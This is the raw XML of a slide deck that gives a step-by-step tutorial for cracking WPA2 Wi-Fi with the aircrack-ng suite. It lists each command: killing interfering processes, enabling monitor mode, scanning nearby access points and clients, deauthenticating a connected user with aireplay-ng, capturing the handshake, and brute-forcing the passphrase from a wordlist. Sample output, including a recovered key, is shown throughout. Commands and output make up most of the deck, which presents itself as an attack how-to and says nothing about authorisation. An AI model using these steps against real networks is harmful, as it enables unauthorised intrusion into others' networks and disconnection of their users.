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FF2-FCC9-4B44-8733-AA2F5C20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2F33-C24C-4BEC-BF32-B3E3B3CED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DD91-157F-4C62-A37A-28701261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0AAE-1DAB-4641-BCCF-4246AFBD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CACC-4539-4BB7-8629-51CACF24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2C10-13AC-4EBF-96F1-522FD31B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E57A0-E830-49C4-81C7-9C55590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045C-FF56-4D7C-A65E-A01A2E5D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1260-2468-428B-8132-7402430D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37F5-58F2-433F-B046-AA946AF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0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D1AFA-4AC2-4133-8D3F-873E0A6F7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FE91-F6A1-4AAC-AD97-9B2FDB55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037D-C1C4-434B-94C2-73F8D73C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C52B-464D-4AED-8DB0-80345C45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C01B-7185-432B-861D-1E4B2E75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C72-6933-4A2A-ACFD-7D6B08AD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30B2-BF62-4640-9EE8-835AA80E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423C-70A8-409D-BB4A-83FAF26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9DB9-8417-4E0F-AE03-7ACA4E4B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C4DF-7CAA-4330-B071-A28947F9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D07A-706B-437F-B330-FD4E6337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4FC7-8A26-450F-A9DC-6D70BD8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710D-1AF4-48EB-888A-21F6642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A71-FBBF-40A6-8A7C-534AA9D1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193F-888C-431B-B597-36C0C3D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3DF2-3409-4893-84A0-272043AB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0E46-53D6-4268-AF82-FFB75861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53E55-ACFB-4D01-B216-56219F2C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B4C11-AABF-49AB-930F-BA21DFBB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BDA29-4796-4D7D-BBDA-327CA832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8D65-DF30-4241-9E6B-A905990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92E5-8B29-4BA2-8C30-8428C990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4E7D-7342-4877-939D-110C5E25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1525-D325-47EE-99A3-2234222A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87BE-6CDF-43EB-8DF3-4C12ABB41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7DF2-6A56-4F24-B00A-F2B7A033C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FA506-EFD6-4BB7-AC8C-DF5213D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B963B-A0BD-4231-A083-CB986C39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DBEB5-5CE1-47C8-BC4E-950D7258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9AD1-EC22-4BDE-9A98-21C6238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5D98B-C19A-4210-A95C-FB964102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4829-212C-480B-B2B9-FFA137F4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7BCC6-6C24-421A-A7E3-35B17A51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1F3E9-534E-446D-A8C8-D802C0D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19884-EB83-42FB-AA09-41BC8BB0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9C6F-7390-4FEA-AB9B-685881B0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4A28-9D0B-4869-B939-171C2B37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E977-2C6E-494A-B591-B81F66B6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EBDD-F1F4-4CC3-B2B8-55D1A80FB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621F-3700-4ECE-86EE-17771E66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646E6-723D-44F9-A33E-7C43D732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31AB4-682D-4CAF-9B4A-8ACAD30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8A8-0519-4BEF-8294-56B47AD4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D71FA-9942-4332-B340-0752EEEA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136F-5F89-4ECA-B413-10C99CA1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8BBAA-FD2A-46B1-8616-0893FD05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5FDE-D593-48E2-8A01-4D59841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F371-5EA1-48C1-BC05-D62FD67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EC38-7BC2-4E92-8567-4E7BCEEC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7AAA-0420-4311-AFF5-F6BB14C1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25AB-165A-4109-A870-C3B7596B9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43BC-E87B-452E-BFCF-CAA4995DC5D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CEB-680C-41AB-8381-14A130E0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3384-25AB-4261-8BE2-63A38F69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8C93-074A-4832-8B03-352ED10D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10B-DC01-44DA-9389-DF129A64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i="1" dirty="0"/>
              <a:t>Crack WPA2 using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" i="1" dirty="0" err="1"/>
              <a:t>aircarck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" i="1" dirty="0"/>
              <a:t>-ng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2446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Command-1 -&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   ┌──(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kali㉿kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)-[~]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   └─$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   [#Root User]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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] password for kali: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command-2 -&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       ┌──(root💀kali)-[/home/kali]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       └─#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng check kill [ Automatically will Change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Killing these processes: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PID Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        13180 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wpa_supplicant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Command-3 -&gt;                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       ┌──(root💀kali)-[/home/kali]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        └─#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng start wlan0 [For Check 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PHY     Interface       Driver          Chipset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phy1    wlan0           r8192cu       Realtek Semiconductor Corp. RTL54CUS 805.15n WLAN Adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  (mac811 monitor mode already enabled for [phy1]wlan0 on [phy1]wlan0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1761528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Command-4 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;! command 4⇒ will work if the interface mode is monitor and if you will run the program as a root user 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⇓⇓⇓⇓ Will SHOW IN THE SCREEN ~~~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SHOW_ALL_Access_Point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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CH  2 ][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 MAC)             PWR  Beacons    #Data,  #/s  CH   MB     ENC    CIPHER  AUTH ESSID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	64:EE:B7:C0:D7:01  -48        3        101              0        1   270    WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    PSK  Foyzul-Islam-Riaz  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:C7:C0:D7:06  -48        3        440              0         6   270    WPA2 CCMP  PSK  Don’t-Touch-ME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:B7:C0:D7:10  -48        3        660              0        11  270    WPA CCMP   PSK  $10-First</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	64:EE:B7:C0:D7:26  -48        3        750              0          7  270    OPEN CCMP  PSK  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abcdxyz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	14:EE:B7:C0:D7:56  -48        3        740              0         12  270    WPA CCMP   PSK  &lt;length : 0&gt;      [NOTE: it's hidden ESSID}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 14:EE:B7:C0:17:56  -48        3        740              0         12  270    WPA CCMP   PSK  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WhoAmI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	BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1658160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Command-5 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:C7:C0:D7:06 --channel 6 –w WPA2_File wlan0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  ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ~~~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show_all_client_who_connect_now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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 CH  6 ][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64:EE:C7:C0:D7:06        -48        3             440        0    6   270    WPA2 CCMP  PSK  Don’t-Touch-ME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dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 11:22:33:44:55:66   @	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 2D:1C:45:55:CD:55   @	@	@	@	@	 @</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 F1:C2:D3:AB:22:55   @  	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="815910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345779" cy="3838074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Command-5 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:C7:C0:D7:06 --channel 6 –w WPA2_File wlan0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  ⇓⇓⇓⇓ Will SHOW IN THE SCREEN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 CH  6 ][ Elapsed: 0 s ][ 2022-02-28 02:02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64:EE:C7:C0:D7:06        -48        3             440        0    6   270    WPA2 CCMP  PSK  Don’t-Touch-ME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dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 11:22:33:44:55:66   @	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 2D:1C:45:55:CD:55   @	@	@	@	@	 @</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 F1:C2:D3:AB:22:55   @  	@	@	@	@	@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9C7C60D-192F-47BF-AE4A-AC9B4B82EB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671763" y="4283242"/>
            <a:ext cx="10848474" cy="2249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                   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NEW TAB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Command-6 -&gt;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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -0 11  -a 64:EE:C7:C0:D7:06 -c F1:C2:D3:AB:22:55 wlan0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7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Command-5 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:C7:C0:D7:06 --channel 6 –w WPA2_File wlan0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  ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓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  CH  6 ][ Elapsed: 0 s ][ 2022-02-28 02:02        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[WPA HANDSHAKE: 64:EE:C7:C0:D7:06]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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 BSSID              PWR  Beacons    #Data, #/s  CH   MB       ENC    CIPHER  AUTH ESSID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64:EE:C7:C0:D7:06        -48        3             440        0    6   270    WPA2 CCMP  PSK  Don’t-Touch-ME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	 BSSID (WIFI)        STATION (USER MAC)  PWR   Rate    Lost    Frames  Notes  Probes  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 11:22:33:44:55:66   @	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 2D:1C:45:55:CD:55   @	@	@	@	@	 @</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 64:EE:C7:C0:D7:06 F1:C2:D3:AB:22:55   @  	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407233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E35D-00F1-49C4-A85C-81F2D3BC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324853"/>
            <a:ext cx="11040979" cy="585211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Command-9 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng –a2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>64:EE:C7:C0:D7:06 –w /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Password_List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WPA2_File*.cap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	⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓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                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng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		              [00:00:00] 21/212 keys tested (3107.20 k/s)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		                    KEY FOUND! [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>PineApple123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		  Master Key     : CD 69 0D 11 8E AC AA C5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>C5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> EC BB 59 85 7D 49 3E </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         		                 B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD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		  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Transcient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    		                   CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71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		   EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50034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1226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Crack WPA2 using aircarck-ng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Disconnect any user from any network</dc:title>
  <dc:creator>Foyzul islam</dc:creator>
  <cp:lastModifiedBy>Foyzul islam</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-01T13:59:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-01T17:45:22Z</dcterms:modified>
</cp:coreProperties>
</file>